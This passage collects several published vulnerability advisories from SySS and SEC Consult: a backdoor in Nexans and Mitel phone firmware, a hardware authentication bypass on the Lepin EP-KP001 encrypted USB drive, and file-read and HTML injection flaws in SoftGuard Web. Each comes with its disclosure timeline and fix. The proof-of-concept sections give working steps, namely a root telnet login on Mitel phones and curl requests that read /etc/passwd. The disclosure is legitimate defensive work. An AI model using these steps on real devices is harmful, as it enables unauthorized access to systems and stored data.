/>2021-08-31: Asked for status update.<br />2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.<br />2022-05-23: Informed vendor that the advisory will be released mid of June 2022.<br />2022-05-24: Firmware V7.02 is available for download which fixes most outdated<br /> components issues.<br />2022-06-15: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides an updated firmware here:<br />https://www.nexans-ans.de/support/firmware/<br /><br />Firmware version V6.02N has the backdoor removed and was already published a while ago.<br />Version V7.02 also has the backdoor removed and most of the outdated software issues.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2022-024<br />Product: EP-KP001<br />Manufacturer: Lepin<br />Affected Version(s): KP001_V19<br />Tested Version(s): KP001_V19<br />Vulnerability Type: Violation of Secure Design Principles (CWE-657)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2022-04-12<br />Solution Date: -<br />Public Disclosure: 2022-06-10<br />CVE Reference: CVE-2022-29948<br />Author of Advisory: Matthias Deeg (SySS GmbH)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Lepin EP-KP001 is a USB flash drive with AES-256 hardware encryption<br />and a built-in keypad for passcode entry.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"[Safeguard Your Sensitive DATA] With Military Grade Full-disk 256-bit<br />AES XTS Hardware Encryption to protect your important files. All your<br />data is protected by hardware encryption, so no one can access your<br />data without knowing the password."<br /><br />Due to an insecure design, the Lepin EP-KP001 flash drive is vulnerable<br />to an authentication bypass attack which enables an attacker to gain<br />unauthorized access to the stored encrypted data.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />When analyzing the USB flash drive Lepin EP-KP001, Matthias Deeg found<br />out that it uses an insecure hardware design which allows an attacker<br />to bypass the password-based user authentication.<br /><br />The Lepin EP-KP001 consists of the following four main parts:<br /><br />1. An unknown NAND flash memory chip<br />2. An Alcor Micro flash disk controller (AU6989SNBL-GTD)<br />3. An unknown microcontroller (unkmarked chip) used as keypad controller<br />4. A high-speed analog switch (SGM7222)<br /><br />The encrypted disk partition with the stored user data can be unlocked<br />by entering the correct passcode via the keypad and pressing the<br />"unlock" button.<br /><br />Due to the performed analysis, the password-based user authentication<br />via a passcode comprised of 6 to 14 digits is performed by the unknown<br />microcontroller.<br /><br />By replacing this unknown microcontroller on a target device with one<br />from an attacker-controlled Lepin EP-KP001 whose passcode was known, it<br />was possible to successfully unlock the targeted Lepin EP-KP001 USB<br />flash drive and to gain unauthorized access to the stored data in<br />cleartext.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />A successful authentication bypass attack could be performed via the<br />following steps:<br /><br />1. Set a passcode on an attacker-controlled Lepin EP-KP001.<br /><br />2. Desolder the unmarked microcontroller from the attacker-controlled<br /> device.<br /><br />3. Desolder the unmarked microcontroller from the targeted Lepin<br /> EP-KP001.<br /><br />4. Solder the unmarked microcontroller from the attacker-controlled<br /> device on the targeted device.<br /><br />5. Unlock the targeted device with the initially set and known passcode.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />SySS is not aware of a security fix for the described security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-04-12: Vulnerability reported to manufacturer<br />2022-06-10: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Lepin EP-KP001<br /> <br />https://www.amazon.com/Encrypted-Password-Aluminum-Portable-Protected/dp/B06W5H9GP7/<br />[2] SySS Security Advisory SYSS-2022-024<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-024.txt<br />[4] SySS GmbH, SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Matthias Deeg of SySS GmbH.<br /><br />E-Mail: matthias.deeg (at) syss.de<br />Public Key: <br />https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc<br />Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2022-021<br />Product: Mitel 6800/6900 Series SIP Phones excluding 6970<br /> Mitel 6900 Series IP (MiNet) Phones<br />Manufacturer: Mitel Networks Corporation<br />Affected Version(s): Rel 5.1 SP8 (5.1.0.8016) and earlier<br /> Rel 6.0 (6.0.0.368) to 6.1 HF4 (6.1.0.165)<br /> MiNet 1.8.0.12 and earlier<br />Tested Version(s): 6.1.0.146<br />Vulnerability Type: Hidden Functionality (Backdoor) (CWE-912)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2022-02-23<br />Solution Date: 2022-05-03<br />Public Disclosure: 2022-06-10<br />CVE Reference: CVE-2022-29854<br /> CVE-2022-29855<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Mitel Networks Corporation manufactures different IP- and SIP-based<br />desk phones.<br /><br />The manufacturer describes these products, e.g., as follows:<br /><br />"The 6900 IP Series is a powerful suite of desk phones with crystal clear<br />audio, advanced features and a broad array of accessories to improve<br />productivity and mobility in today's modern business environment."<br /><br />The firmware of several phones contains an undocumented backdoor which<br />allows an attacker to gain root access by pressing specific keys on<br />system boot.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The shell script "check_mft.sh", which is located in the directory<br />"/etc" on the phone, checks whether the keys "*" and "#" are pressed<br />simultaneously during system startup.<br /><br />The phone then sets its IP address to "10.30.102.102" and starts a<br />Telnet server. A Telnet login can then be performed with a static root<br />password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Identify the backdoor<br /><br />1.1. Extract the jffs2 file system from an affected Mitel firmware:<br /><br />#> binwalk -e 6867i.st<br /><br />DECIMAL HEXADECIMAL DESCRIPTION<br />- --------------------------------------------------------------------------------<br />347 0x15B Linux kernel ARM boot executable zImage (little-endian)<br />15695 0x3D4F gzip compressed data, maximum compression, from Unix, last modified: 2021-10-22 10:47:08<br />1223395 0x12AAE3 JFFS2 filesystem, little endian<br /><br /><br />1.2. Mount the jffs2 file system:<br /><br />#> modprobe jffs2<br />#> modprobe mtdram total_size=70000<br />#> modprobe mtdblock<br />#> dd if=12AAE3.jffs2 of=/dev/mtdblock0<br />#> mount -t jffs2 /dev/mtdblock0 /mnt/<br /><br /><br />1.3. The script "check_mft.sh" located in the "/etc" directory contains<br />the backdoor logic:<br /><br />#> cat /mnt/etc/check_mft.sh<br />************* content shortened ****************<br />#!/bin/sh<br /><br />case "$HOSTNAME" in<br /><br />#press and hold * # two keys at the same time<br /> <br /> "bcm911109_6867i" | "6867i" | "bcm911107_praxis_3" | "bcm911109_aquarius_3")<br /> GPIODetect=`gpio get 4`<br /> checkDhsgShorted<br /> #KEY_OUT0 (GPIO52) -> KEY_IN7 (GPIO50) "DownKey" is press<br /> isCCATest=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 017f 01ff 01ff 01ff 01ff 01ff 01ff"`<br /> <br /> keyBoardScanMatch="True"<br /> keycombinationMatch=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 01ff 01ff 01ff 01af 01ff 01ff 01ff"`<br /> ;;<br />esac<br /><br />echo "keyBoardScanMatch = $keyBoardScanMatch, dhsgShorted=$dhsgShorted "<br />echo "GPIODetect = $GPIODetect,keycombinationMatch=$keycombinationMatch"<br />echo "isCCATest = $isCCATest"<br /><br />if [ "$keyBoardScanMatch" -a $dhsgShorted -eq 1 -a $GPIODetect -eq "0" -o "$keycombinationMatch" ]; then<br /> mount -t jffs2 /dev/mtdblock3 /nvdata<br /> if [ -f $ENETCFG ]; then<br /> . $ENETCFG<br /> MAC=${ENETCFG_MAC}<br /> fi<br /><br /> /etc/if_bcm_net_setup.sh up<br /> ifconfig eth0 hw ether $MAC<br /> ifconfig eth0 10.30.102.102 netmask 255.255.255.0 up<br /> <br /> if [ -f /usr/sbin/telnetd ]; then<br /> telnetd &<br /> fi<br /> exit 255<br />fi<br />************* content shortened ****************<br /><br /><br />1.4. The file "ota_BCM911109_PRAXIS_3_voice_v6_5_jffs2.bin" located in<br />the directory "/etc" contains another jffs2 file system.<br /><br /><br />1.5. Extract and mount the file system as described in Steps 1<br />and 2.<br /><br /><br />1.6. The "check_mft.sh" in this file system also contains the root<br />password which is set by default and forced by the script:<br /><br />#> cat /mnt/etc/check_mft.sh<br />************* content shortened ****************<br />if [ -f /usr/sbin/telnetd ]; then<br /># make sure the default password is set for root.<br /> (echo (password stripped out); sleep 1; echo (password stripped out) | passwd -a A<br /> telnetd &<br />fi<br />************* content shortened ****************<br /><br /><br />2. Exploiting<br /><br />2.1. Boot the phone and press the "*" and "#" keys simultaneously.<br /><br /><br />2.2. Assign an IP address to communicate with the phone:<br /><br />#> ip addr add 10.30.102.100/24 dev eth0<br /><br /><br />2.3. Now, logging in to the phone as the root user with the static password<br />via Telnet is possible:<br /><br />#> telnet 10.30.102.102<br />Trying 10.30.102.102...<br />Connected to 10.30.102.102.<br />Escape character is '^]'.<br /><br />(none) login: root<br />Password:<br />10.30.102.102 # id<br />uid=0(root) gid=0(root) groups=0(root)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Upgrade to one of the following (or later) versions:<br />- - 5.1 SP8 HF1 (5.1.0.8017)<br />- - 6.1 HF5 (6.1.0.171)<br />- - 6.2 SP1 (6.2.0.1012)<br />- - MiNet 1.8.0.15<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-02-22: Vulnerability discovered<br />2022-02-23: Vulnerability reported to manufacturer<br />2022-02-24: Acknowledgement of receipt of the vulnerability report<br /> received from the manufacturer<br />2022-03-30: Consultation with the manufacturer regarding updates to fix<br /> the vulnerability<br />2022-03-30: Manufacturer confirms the vulnerability, informs about the<br /> status to fix the vulnerability and asks for an extension of<br /> the disclosure timeline<br />2022-03-31: New disclosure date set to 2022-05-10<br />2022-05-04: Asking the manufacturer for any updates regarding the<br /> vulnerability<br />2022-05-05: Manufacturer provides a patch to fix this vulnerability<br />2022-05-05: Manufacturer publishes the vulnerability and assigned CVE IDs<br />2022-05-05: Manufacturer asks for another extension of the disclosure<br /> timeline, as large parts of the phones may still be unpatched<br /> in practice<br />2022-05-05: New disclosure date set to 2022-06-10<br />2022-06-10: Public disclosure of the vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Mitel IP desk phones:<br /> https://www.mitel.com/products/devices-accessories/ip-phones-peripherals<br />[2] SySS Responsible Disclosure Policy:<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[3] Vulnerability reports by the manufacturer:<br /> https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0004<br /> https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0003<br />[4] CVE-2022-29854:<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29854<br />[5] CVE-2022-29855:<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29855<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmKaIVcACgkQrgyb+PE0<br />i1O5fA/9H7onaudE9cqHwqBf0cjdXczlo2e52XXIvcX7NdxQ7HAPuo3kXAeHQCg4<br />0IlP2MB8rTBLtEJf43ZJhqDuK2J+Q6ypsVrmAzvCBYswsJjFH2SKYkS9cIx3CSaw<br />35G+J578oYQMex0fZJGK3vYGBPtTIoXhW3Gb4rdG41o6lhKQ3ELF04/9CQTUpKao<br />llCYe3zOhmacnpJ93w5aCenEPqJnrOy0w1bguQN6j43cEnGyv7hVIwW4ukQ4yTvz<br />iBjoRBx89VdjEQKb7g52D6pnORT48vgkDNXZcowofKtD1LZxPz6fC+cuBabSJz41<br />MFObTqfW9tYTVsBAuqIlQWavp3sy1Jenh/wb9gHILVXupv5flux2ffuKZPyDg6dq<br />dh66GXJaXEX0cWuUax8z6nj6l0nWOcjmbo07Ad1rox8bSOffSvtNRxEgij8tjwPg<br />UpWD6sofHid9BhGWJpyziBRvADDYSakohHZA+GCNONopVwhJdE+RrfOWaD1HV7jn<br />V+RI1ZmB1MYSDHKK11sfYpIFn1qdvF3l0hM0YVjxcy2iNn/cR9ZnId0wtRK4mVhx<br />wx5XBltwHMBREPgNUnqAmsAuAOitt7+vHdVpWA0/0A1vjJnFfdDy2rSiNoDRysrE<br />jp76E0iYjNPWdtJE67Q449Vwk6RINH7C+sSMbAQq5WfY336TyNQ=<br />=jFCk<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220609-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities<br /> product: SoftGuard SNMP Network Management Extension<br /> vulnerable version: SoftGuard Web (SGW) < 5.1.5<br /> fixed version: SoftGuard version 5.1.5 from 2022-06-01<br /> CVE number: CVE-2022-31201, CVE-2022-31202<br /> impact: High<br /> homepage: https://gravitate.eu (reseller)<br /> found: 2022-04-14<br /> by: Philipp Espernberger (Office Linz)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />There is no public description available for this vendor/product. The following<br />description was provided as documentation:<br /><br />"SoftGuard is a network management extension which collects inventory-, analysis-<br />and debugging data of devices and networks at least once a day. SoftGuard has an<br />open structure, is built simple, is easily expandable, easy to use and is laid out<br />for large scale networks. The data collection is performed with the protocols SNMP<br />supporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh,<br />https, NetBIOS/IP, ICMP ... complemented by SNMP if required.<br /><br />The SoftGuard Suite consists of three parts:<br /><br />* SoftGuard Network Center (SNC)<br />* SoftGuard Host Center (SHC)<br />* SoftGuard Monitor Center (SMC)<br /><br />Aditionally there are a bunch of common and customer specific expansions like<br />SoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT),<br />Network Access Points (NAP), Technician Access Point (TAP), etc."<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends to update to the latest version of SoftGuard (network management<br />extension).<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, to identify and resolve potential further critical security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) File System Access (CVE-2022-31202)<br />The export function allows authenticated attackers to download any<br />arbitrary local file from the file system due to insufficient input<br />validation. The unfiltered URL parameter query enables an attacker to<br />access arbitrary local files. This allows the attacker to define the<br />complete path and the filename by himself. Files that include passwords<br />and other sensitive information can be accessed.<br />Furthermore, the built-in man functionality also allows attackers to<br />read any arbitrary local file from the file system.<br /><br />2) HTML Injection (CVE-2022-31201)<br />Various components do not properly sanitize/encode user input. This<br />leads to HTML injection vulnerabilities. By exploiting this vulnerability,<br />an attacker can include arbitrary HTML into the affected web page. The<br />code is executed in the context of the victim's browser when visiting<br />the manipulated URL. The vulnerability can be used to change the contents<br />of the displayed site or redirect to other sites.<br /><br />During the security assessment it was not possible to execute JavaScript<br />code because the security headers Content-Security-Policy and<br />X-Content-Type-Options are preventing the execution.<br /><br /><br />Proof of concept:<br />-----------------<br />1) File System Access (CVE-2022-31202)<br />1a) Export functionality<br />In order to access arbitrary local files, the export function as authenticated<br />user (Administration -> User -> Access -> Export) can be used. The following URL<br />was used to set the filename to /etc/passwd<br />===============================================================================<br />https://$host:8016/sgw/export?dbs=file&db=DefUser_access_$username_db%2e<br />1649426888398872%2etmp&query=file%3a/etc/passwd'<br /><br />===============================================================================<br /><br />The newly set filename (/etc/passwd) can be exported and downloaded via the<br />execution button. Afterwards the content of the file gets downloaded successfully.<br />===============================================================================<br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />sync:x:5:0:sync:/sbin:/bin/sync<br />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br />nobody:x:99:99:Nobody:/:/sbin/nologin<br />systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin<br />dbus:x:81:81:System message bus:/:/sbin/nologin<br />[...]<br />===============================================================================<br /><br />1b) MAN functionality<br />The following curl command shows how an authenticated attacker can gain access<br />to any arbitrary local file:<br />===============================================================================<br />curl 'https://$host:8016/cgi-bin/man.tcl' -H 'Authorization: Basic [...]'<br />--data 'act=1&x=%2Fetc%2Fpasswd&submit=Execute' --compressed --insecure<br /><br />===============================================================================<br /><br />The curl response includes the contents of the file:<br />===============================================================================<br /><!DOCTYPE html><br /><html lang="en"><head><meta charset="UTF-8" /><br />[...]<br /><pre><br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />sync:x:5:0:sync:/sbin:/bin/sync<br />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br />nobody:x:99:99:Nobody:/:/sbin/nologin<br />systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin<br />dbus:x:81:81:System message bus:/:/sbin/nologin<br />[...]<br />===============================================================================<br /><br />2) HTML Injection (CVE-2022-31201)<br />When a new graph is created an authenticated attacker controls the GET parameters<br />and can inject malicious content. The following curl command shows how an<br />authenticated attacker can inject HTML code:<br />===============================================================================<br />curl 'https://$host:8016/sgw/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC-<br />Consult%3C/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5'<br />-H 'Authorization: Basic [...]' --compressed --insecure<br /><br />===============================================================================<br /><br />The curl response includes the injected HTML code <h1>SEC Consult</h1>:<br />===============================================================================<br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"/><br /> <title>SGW - Graph: Node</title><br />[...]<br /></head><br /><body class="master"><br /> [...]<br /> <caption>∑3, Status<h1>SEC Consult</h1>, #11212</caption><br /> [...]<br /> <tr><td>Status<h1>SEC Consult</h1></td><br />[...]<br /></body></html><br />===============================================================================<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* SoftGuard Web (SGW) 5.1.3<br /><br />The vendor provided the following information regarding the affected versions:<br /><br />1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05)<br />1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998/99)<br />2) since SoftGuard 3.6.0 (2009-10-31) / SoftGuard 3.6.6 (2011-02-15) with<br /> SoftGuard Web 2.6.0/2.6.6<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-05-11: Contacting vendor through direct email address.<br />2022-05-11: Sent encrypted security advisory to vendor<br />2022-05-12: Received feedback from the vendor for the security advisory<br />2022-05-16: Received confirmation that a new version of SoftGuard was<br /> already rolled out to the customers which included the fix<br />2022-05-16: Received additional information which versions are vulnerable<br />2022-05-19: Received CVE numbers.<br />2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection<br /> still works at other endpoints, other issues are fixed.<br />2022-05-20: Vendor replies that new version 5.1.5. will be released on 1st June.<br />2022-06-01: Vendor releases patched version 5.1.5.<br />2022-06-09: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor rolled out new software versions. Affected users should verify that<br />they are using the latest version available (5.1.5 from 2022-06-01 or higher).<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF P. Espernberger / @2022<br /><br /></code></pre>